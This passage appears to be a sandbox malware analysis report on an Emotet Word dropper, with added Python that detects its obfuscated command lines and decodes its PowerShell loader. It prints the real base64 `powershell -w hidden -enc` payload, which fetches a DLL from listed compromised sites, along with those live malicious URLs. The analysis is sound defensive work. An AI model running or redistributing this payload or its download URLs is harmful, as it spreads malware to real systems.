                      Source: C:\Windows\SysWOW64\rundll32.exe; Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xsugi\zrfn.shd',FIxqgRZUp
                      Source: C:\Windows\SysWOW64\rundll32.exe; Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xsugi\zrfn.shd',#1
                      Source: C:\Windows\SysWOW64\rundll32.exe; Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Omuzql\aridm.cve',PiBVmMpskdW
                      Source: C:\Windows\SysWOW64\rundll32.exe; Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Omuzql\aridm.cve',#1
                      Source: C:\Windows\SysWOW64\rundll32.exe; Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yjyrclfl\qwodoyj.whn',CPVO
                      Source: C:\Windows\SysWOW64\rundll32.exe; Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yjyrclfl\qwodoyj.whn',#1
                      Source: unknown; Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc 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
                      Source: unknown; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcA
A9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3AC
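The process-creation chain above is what the report's "Obfuscated command line found", "Sigma detected: Suspicious Encoded PowerShell Command Line" and "Sigma detected: Suspicious Call by Ordinal" signatures fire on: cmd.exe escapes nearly every character of the lure (`m^s^g ... Wo^rd exp^erien^ced an er^ror`) and of `p^owe^rs^he^ll^ -w hi^dd^en -^e^nc`, PowerShell runs a base64 payload in a hidden window, and rundll32.exe loads a DLL dropped under the user profile, then re-launches itself with modules named `.shd`, `.cve` and `.whn` and an ordinal (`#1`) entry point. The Python below is an added example written for this page, not Joe Sandbox or Sigma code: it applies those checks to command lines constructed from the entries listed above (the elided base64 blob is replaced by the stand-in token `AAAA`, and one benign Control Panel launch is added for contrast).

```python
"""Triage rules for Emotet-style process-creation command lines.

Added example for this report, not Joe Sandbox or Sigma code.  The sample
lines are constructed from the process-creation entries listed above; the
elided base64 blob is replaced by the stand-in token 'AAAA' and a benign
rundll32 invocation is added for contrast.
"""
from __future__ import annotations

import re

# rundll32.exe <module>[,<entry>]  (module may be single-quoted, as in the report)
RUNDLL = re.compile(r"rundll32\.exe'?\s+'?([^',\s]+)'?(?:,(#?\w+))?", re.I)
ENC_PS = re.compile(r"powershell(?:\.exe)?\b.*\s-(?:e|en|enc|encodedcommand)\s", re.I)
HIDDEN = re.compile(r"\s-w(?:indowstyle)?\s+hidden\b", re.I)


def analyze(cmdline: str) -> list[str]:
    """Return the names of every rule the command line trips, in fixed order."""
    hits: list[str] = []
    # cmd.exe strips '^' before execution, so normalise first; the raw caret
    # count is itself a signal (three or more is far beyond ordinary escaping).
    plain = cmdline.replace("^", "")
    if cmdline.count("^") >= 3 and re.search(r"\bcmd(?:\.exe)?\b", cmdline, re.I):
        hits.append("cmd_caret_obfuscation")
    if ENC_PS.search(plain):
        hits.append("powershell_encoded_command")
    if HIDDEN.search(plain):
        hits.append("powershell_hidden_window")
    m = RUNDLL.search(plain)
    if m:
        module, entry = m.group(1), m.group(2)
        ext = module.rsplit(".", 1)[-1].lower() if "." in module else ""
        if ext != "dll":
            hits.append("rundll32_non_dll_extension")      # zrfn.shd, aridm.cve, qwodoyj.whn
        if entry and entry.startswith("#"):
            hits.append("rundll32_call_by_ordinal")        # ',#1'
        if module.lower().startswith("c:\\users\\"):
            hits.append("rundll32_module_in_user_profile")  # DLL dropped by PowerShell
    return hits


# Constructed from the report's process-creation lines (base64 replaced by 'AAAA').
SAMPLE_CMDLINES = [
    r"cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. "
    r"& p^owe^rs^he^ll^ -w hi^dd^en -^e^nc AAAA",
    r"msg user /v Word experienced an error trying to open the file.",
    r"powershell -w hidden -enc AAAA",
    r"'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString",
    r"C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xsugi\zrfn.shd',FIxqgRZUp",
    r"C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Omuzql\aridm.cve',#1",
    # benign control: a stock Control Panel launch (constructed, not from the report)
    r"C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL",
]


def triage(cmdlines=SAMPLE_CMDLINES) -> dict[str, list[str]]:
    """Map each command line to its rule hits; lines with no hits are kept too."""
    return {c: analyze(c) for c in cmdlines}


if __name__ == "__main__":
    for line, hits in triage().items():
        print(", ".join(hits) or "-", "|", line[:80])
```

The `msg.exe` line trips nothing on its own; its value is as context, since the fake "Word experienced an error" pop-up is what makes the victim shrug off the macro having run. The benign `shell32.dll,Control_RunDLL` line shows why the rundll32 checks look at the module's extension, location and entry-point form rather than at rundll32.exe itself.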
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\hh.exe VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exe; Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
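The decoded script in the "Encrypted powershell cmdline option found" entries above is the second stage of this document. `powershell -enc` takes base64 over UTF-16LE text, and the loader hides every string behind `'a'+'b'` concatenation, parenthesised fragments and `-F` format strings; its download list is one literal with entries separated by `!`, in which the scheme is replaced by the placeholder `ns wu db nd` while `$K1iuxxp` is built as `'h'+'tt'+'p'`. The split and `-replace` that restore `http` fall past the end of the command line as shown in the report, so that step is inferred here. The Python below is an added example for this page, not Joe Sandbox or Emotet code: it decodes an `-enc` blob, folds the concatenation, collects the literal assignments and restores the URL list. Its input is a constructed fragment made of the report's own string pieces (the shannared.com and jeevanlic.com entries exactly as listed above), plus an `https` entry for skilmu.com taken from the report's URL table to exercise the `placeholder + s://` case; `-F` format strings are deliberately left alone.

```python
"""Decode and de-obfuscate an Emotet-style `powershell -enc` loader.

Added example for this report, not Joe Sandbox or Emotet code.  Assumptions:
strings are built with '+' concatenation and parentheses, the download URLs
sit in one single-quoted literal separated by '!', and the URL scheme hides
behind a placeholder the script later swaps for the value of a variable that
folds to 'http' (that swap is cut off in the report, so it is inferred here).
"""
from __future__ import annotations

import base64
import re
from typing import Optional

_LIT = r"'((?:[^']|'')*)'"                       # single-quoted literal ('' escapes ')
_CONCAT = re.compile(_LIT + r"\s*\+\s*" + _LIT)   # 'a'+'b' -> 'ab'
_PAREN = re.compile(r"\(\s*" + _LIT + r"\s*\)")   # ('a')   -> 'a'
_ASSIGN = re.compile(r"\$(\w+)\s*=\s*" + _LIT)    # $x='a'  (after folding)


def decode_enc(blob: str) -> str:
    """Decode the argument of `powershell -enc`: base64 over UTF-16LE text."""
    return base64.b64decode(blob).decode("utf-16le")


def encode_enc(script: str) -> str:
    """Inverse of decode_enc; used here only to build the constructed sample."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def collapse_concat(ps: str) -> str:
    """Fold 'a'+'b' and ('a') repeatedly until the text stops changing.

    Double-quoted strings and the -F format operator are left untouched, so
    "{1}{0}" -F 'b','a' style type names still need a manual pass.
    """
    prev = None
    while prev != ps:
        prev = ps
        ps = _CONCAT.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", ps)
        ps = _PAREN.sub(lambda m: "'" + m.group(1) + "'", ps)
    return ps


def literal_assignments(ps: str) -> dict[str, str]:
    """Map $var -> value for every assignment that folds down to one literal."""
    flat = collapse_concat(ps)
    return {name: val.replace("''", "'") for name, val in _ASSIGN.findall(flat)}


def _common_prefix(items: list[str]) -> str:
    prefix = items[0]
    for s in items[1:]:
        while not s.startswith(prefix):
            prefix = prefix[:-1]
    return prefix


def extract_urls(ps: str, placeholder: Optional[str] = None) -> list[str]:
    """Return the download URLs with the real scheme restored.

    The URL list is the literal containing both '://' and '!'; the scheme is
    the literal equal to 'http' or 'https'.  By default the placeholder is the
    text all entries share before '://'.  If every entry is https that shared
    text would wrongly include the trailing 's', so pass `placeholder` then.
    """
    values = literal_assignments(ps)
    scheme = next((v for v in values.values() if v in ("http", "https")), "http")
    url_list = next((v for v in values.values() if "://" in v and "!" in v), None)
    if url_list is None:
        return []
    pieces = [p for p in url_list.split("!") if "://" in p]
    if placeholder is None:
        placeholder = _common_prefix([p.split("://", 1)[0] for p in pieces])
    return [p.replace(placeholder, scheme, 1) for p in pieces]


# Constructed sample: the scheme variable and the first two URL entries are the
# report's own pieces; the https skilmu.com entry is added from the report's URL
# table; $I70Z is a decoy assignment of the kind the real script is padded with.
SAMPLE_PS = (
    "$K1iuxxp='h' + 'tt' + 'p';$I70Z=('Y5'+'0E');"
    "$Ta1ysp4=('ns'+' '+('wu d'+'b ')+('n'+'d:')+('/'+'/shan')+'n'+('ar'+'e')+'d'"
    "+('.com/co'+'n'+'te'+'n')+'t'+('/lh'+'A')+('Le'+'S')+('/!n'+'s')+(' wu '+'db')"
    "+(' n'+'d:')+'//'+('jee'+'van')+('lic.com/w'+'p-'+'co'+'n'+'te')+('nt'+'/')"
    "+('r'+'8M/!'+'ns')+(' '+'wu '+'db nd')+('s:/'+'/sk')+'il'+('mu.com/wp-'+'admin/hQVlB8b/'))"
)
SAMPLE_ENC = encode_enc(SAMPLE_PS)

if __name__ == "__main__":
    for url in extract_urls(decode_enc(SAMPLE_ENC)):
        print(url)
```

Run against the real blob, feed the `-enc` argument to `decode_enc` first; the first 48 characters of the one in this report decode to `SET  ("5"+"FTsG") `, matching the decoded text shown above. Folding the concatenation also exposes the drop path pattern `'{0}Kaktksw{0}An6othh{0}' -F [chaR]92`, which is the `C:\Users\user\Kaktksw\An6othh\` directory the report lists for `N49I.dll`.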

                      Stealing of Sensitive Information:

                      Yara detected Emotet
                      Source: Yara match; File source: 0000000E.00000002.2340258197.0000000000740000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara match; File source: 0000000E.00000002.2340368896.00000000007E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match; File source: 0000000D.00000002.2114550082.00000000007B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000008.00000002.2102026803.00000000002D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match; File source: 0000000D.00000002.2114093455.0000000000710000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000009.00000002.2103817256.0000000000770000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara match; File source: 0000000C.00000002.2112160359.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match; File source: 0000000A.00000002.2106310017.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000007.00000002.2099609589.00000000002E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match; File source: 0000000D.00000002.2113942317.00000000006A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match; File source: 0000000A.00000002.2106250328.0000000000160000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000009.00000002.2103543445.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match; File source: 0000000C.00000002.2112213482.00000000002B0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000007.00000002.2099871520.0000000000510000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000009.00000002.2103566665.0000000000210000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000007.00000002.2099349373.0000000000240000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara match; File source: 0000000B.00000002.2110427728.00000000002A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000008.00000002.2102360231.0000000000990000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match; File source: 0000000B.00000002.2110654197.0000000000750000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara match; File source: 0000000A.00000002.2111292152.0000000000B10000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000008.00000002.2101833824.0000000000230000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara match; File source: 0000000E.00000002.2340125586.0000000000300000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match; File source: 0000000B.00000002.2110403391.0000000000220000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match; File source: 0000000C.00000002.2112133272.0000000000180000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match; File source: 9.2.rundll32.exe.210000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 14.2.rundll32.exe.740000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 12.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 11.2.rundll32.exe.750000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 11.2.rundll32.exe.2a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 12.2.rundll32.exe.2b0000.1.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 14.2.rundll32.exe.740000.1.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 10.2.rundll32.exe.b10000.1.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 7.2.rundll32.exe.2e0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 8.2.rundll32.exe.990000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 12.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 9.2.rundll32.exe.210000.0.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 13.2.rundll32.exe.7b0000.1.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 10.2.rundll32.exe.160000.0.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 9.2.rundll32.exe.770000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 7.2.rundll32.exe.240000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 13.2.rundll32.exe.710000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 7.2.rundll32.exe.240000.0.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 13.2.rundll32.exe.710000.0.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 10.2.rundll32.exe.b10000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 14.2.rundll32.exe.300000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 9.2.rundll32.exe.770000.1.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 10.2.rundll32.exe.160000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 11.2.rundll32.exe.2a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 13.2.rundll32.exe.7b0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 12.2.rundll32.exe.2b0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 8.2.rundll32.exe.230000.0.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 14.2.rundll32.exe.300000.0.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 11.2.rundll32.exe.750000.1.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 7.2.rundll32.exe.2e0000.1.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 8.2.rundll32.exe.230000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 8.2.rundll32.exe.990000.1.unpack, type: UNPACKEDPE

                      Mitre Att&ck Matrix

                      Techniques per tactic as laid out in the report's matrix. Numbers in parentheses are the count badges shown next to the techniques this analysis actually matched; entries without a number are the matrix's unmatched filler.

                      Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
                      Execution: Windows Management Instrumentation (11); Command and Scripting Interpreter (211); Scripting (12); Exploitation for Client Execution (3); PowerShell (3); Launchd; Scheduled Task; Command and Scripting Interpreter; PowerShell
                      Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
                      Privilege Escalation: Process Injection (111); Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
                      Defense Evasion: Masquerading (21); Virtualization/Sandbox Evasion (2); Disable or Modify Tools (11); Process Injection (111); Deobfuscate/Decode Files or Information (3); Scripting (12); Hidden Files and Directories (1); Obfuscated Files or Information (1); Rundll32 (1)
                      Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
                      Discovery: Security Software Discovery (11); Virtualization/Sandbox Evasion (2); Process Discovery (2); Remote System Discovery (1); File and Directory Discovery (2); System Information Discovery (15); Network Sniffing; Network Service Scanning; System Network Connections Discovery
                      Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools
                      Collection: Archive Collected Data (1); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
                      Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
                      Command and Control: Encrypted Channel (2); Non-Standard Port (1); Ingress Tool Transfer (12); Non-Application Layer Protocol (2); Application Layer Protocol (112); Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
                      Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
                      Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
                      Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction

                      Behavior Graph

                      Behavior Graph ID: 344852   Sample: ARCH_25_012021.doc   Startdate: 27/01/2021   Architecture: WINDOWS   Score: 100

                      Network endpoints at the top level: 1.226.84.243:8080 (unknown, unknown); 104.130.154.83:7080 (unknown, unknown); 91 other IPs or domains
                      Signatures at the top level: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Multi AV Scanner detection for domain / URL; Found malware configuration; 16 other signatures

                      Process tree (both WINWORD.EXE and cmd.exe hang off the start node; the numbers after a process are the counts shown beside it in the graph):
                      WINWORD.EXE 293 30
                      cmd.exe
                          Signatures: Suspicious powershell command line found; Very long command line found; Encrypted powershell cmdline option found
                          msg.exe
                          powershell.exe 12 9
                              Network: shannared.com 192.169.223.13, 49167, 80, AS-26496-GO-DADDY-COM-LLCUS United States
                              Dropped: C:\Users\user\Kaktksw\An6othh\N49I.dll, PE32
                              Signatures: Powershell drops PE file
                              rundll32.exe
                                  rundll32.exe
                                      rundll32.exe 2
                                          Signatures: Hides that the sample has been downloaded from the Internet (zone.identifier)
                                          rundll32.exe
                                              rundll32.exe 1
                                                  Signatures: Hides that the sample has been downloaded from the Internet (zone.identifier)
                                                  rundll32.exe
                                                      rundll32.exe 1
                                                          Signatures: Hides that the sample has been downloaded from the Internet (zone.identifier)
                                                          rundll32.exe

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      Source | Detection | Scanner | Label
                      ARCH_25_012021.doc | 57% | Virustotal |
                      ARCH_25_012021.doc | 26% | ReversingLabs | Document-Word.Trojan.GenScript

                      Dropped Files

                      Source | Detection | Scanner | Label
                      C:\Users\user\Kaktksw\An6othh\N49I.dll | 100% | Joe Sandbox ML |
                      C:\Users\user\Kaktksw\An6othh\N49I.dll | 82% | ReversingLabs | Win32.Trojan.EmotetCrypt

                      Unpacked PE Files

                      Source | Detection | Scanner | Label
                      14.2.rundll32.exe.740000.1.unpack | 100% | Avira | HEUR/AGEN.1110387
                      12.2.rundll32.exe.2b0000.1.unpack | 100% | Avira | HEUR/AGEN.1110387
                      10.2.rundll32.exe.b10000.1.unpack | 100% | Avira | HEUR/AGEN.1110387
                      13.2.rundll32.exe.710000.0.unpack | 100% | Avira | HEUR/AGEN.1110387
                      7.2.rundll32.exe.240000.0.unpack | 100% | Avira | HEUR/AGEN.1110387
                      9.2.rundll32.exe.770000.1.unpack | 100% | Avira | HEUR/AGEN.1110387
                      8.2.rundll32.exe.230000.0.unpack | 100% | Avira | HEUR/AGEN.1110387
                      11.2.rundll32.exe.750000.1.unpack | 100% | Avira | HEUR/AGEN.1110387
                      7.2.rundll32.exe.2e0000.1.unpack | 100% | Avira | HEUR/AGEN.1110387

                      Domains

                      Source | Detection | Scanner | Label
                      shannared.com | 5% | Virustotal |

                      URLs

                      Source | Detection | Scanner | Label
                      http://3musketeersent.net/wp-includes/TUgD/ | 8% | Virustotal |
                      http://3musketeersent.net/wp-includes/TUgD/ | 100% | Avira URL Cloud | malware
                      http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
                      https://skilmu.com/wp-admin/hQVlB8b/ | 11% | Virustotal |
                      https://skilmu.com/wp-admin/hQVlB8b/ | 0% | Avira URL Cloud | safe
                      http://jeevanlic.com/wp-content/r8M/ | 0% | Avira URL Cloud | safe
                      http://dashudance.com/thinkphp/dgs7Jm9/ | 100% | Avira URL Cloud | malware
                      http://shannared.com | 0% | Avira URL Cloud | safe
                      http://shannared.com/content/lhALeS/ | 100% | Avira URL Cloud | malware
                      http://www.%s.comPA | 0% | URL Reputation | safe
                      http://mmrincs.com/eternal-duelist-9cuqv/jxGQj/ | 100% | Avira URL Cloud | malware
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
                      http://leopardcranes.com/zynq-linux-yaayf/w/ | 100% | Avira URL Cloud | malware

                      Domains and IPs

                      Contacted Domains

                      Name | IP | Active | Malicious | Antivirus Detection | Reputation
                      shannared.com | 192.169.223.13 | true | true | | unknown

                      Contacted URLs

                      Name | Malicious | Antivirus Detection | Reputation
                      http://shannared.com/content/lhALeS/ | true | Avira URL Cloud: malware | unknown

                      URLs from Memory and Binaries

